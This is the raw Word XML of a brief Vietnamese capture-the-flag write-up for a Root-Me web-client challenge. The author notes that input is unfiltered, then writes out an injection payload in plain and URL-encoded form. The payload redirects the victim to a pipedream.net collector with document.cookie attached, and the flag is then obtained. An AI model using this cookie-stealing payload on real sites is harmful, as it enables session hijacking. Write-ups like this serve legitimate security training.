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00F7" w14:textId="0E1AD397" w:rsidR="00F777C2" w:rsidRDefault="00E2022A">
      <w:r>
        <w:t>Đầu tiên vào thì ta thấy thông tin input không được filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3633F81C" w14:textId="293BC4DC" w:rsidR="00E2022A" w:rsidRDefault="00E2022A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="748DDC0E" wp14:editId="25AAEC66">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="142318373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83735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E5CD" w14:textId="0F841919" w:rsidR="00E2022A" w:rsidRDefault="00E2022A">
      <w:r>
        <w:t>Ta sẽ thực hiện tạo payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C39AAA" w14:textId="7F030E8E" w:rsidR="00E2022A" w:rsidRDefault="00E2022A">
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="004B0438">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://challenge01.root-me.org/web-client/ch34/index.php?calculation=1+1`${document.location="https://eon5wu9esj2rcgn.m.pipedream.net?c="+document.cookie}`</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1EFEFD68" w14:textId="2F101AD6" w:rsidR="00E2022A" w:rsidRDefault="00E2022A">
      <w:r>
        <w:t>đổi sang url enc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E24F33" w14:textId="01B6CF74" w:rsidR="00E2022A" w:rsidRDefault="00E2022A">
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="004B0438">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://challenge01.root-me.org/web-client/ch34/index.php?calculation=1%2B1`${document.location=%22https://eon5wu9esj2rcgn.m.pipedream.net?c=%22%2Bdocument.cookie}`</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5D414C23" w14:textId="6CF6651E" w:rsidR="00E2022A" w:rsidRDefault="00E2022A">
      <w:r>
        <w:t>gửi đi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A39D5E8" w14:textId="43922563" w:rsidR="00E2022A" w:rsidRDefault="00E2022A">
      <w:r w:rsidRPr="00E2022A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76A2A9D7" wp14:editId="595A8BEC">
            <wp:extent cx="4515480" cy="1609950"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="16206073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07370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199C" w14:textId="682A0A7E" w:rsidR="00E2022A" w:rsidRDefault="00E2022A">
      <w:r>
        <w:t>Nhận được flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C47B85" w14:textId="2DE6A499" w:rsidR="00E2022A" w:rsidRDefault="00E2022A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04455C8D" wp14:editId="2BA90468">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="49436895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68950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16"/>
    <w:rsid w:val="00710116"/>
    <w:rsid w:val="00E2022A"/>
    <w:rsid w:val="00F7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562E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{076C105B-011E-4498-8FE8-AD691DBB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allenge01.root-me.org/web-client/ch34/index.php?calculation=1%2B1%60$%7bdocument.location=%22https://eon5wu9esj2rcgn.m.pipedream.net?c=%22%2Bdocument.cookie%7d%60" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://challenge01.root-me.org/web-client/ch34/index.php?calculation=1+1%60$%7bdocument.location=%22https://eon5wu9esj2rcgn.m.pipedream.net?c=%22+document.cookie%7d%6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2023-04-06T08:43:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-06T08:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>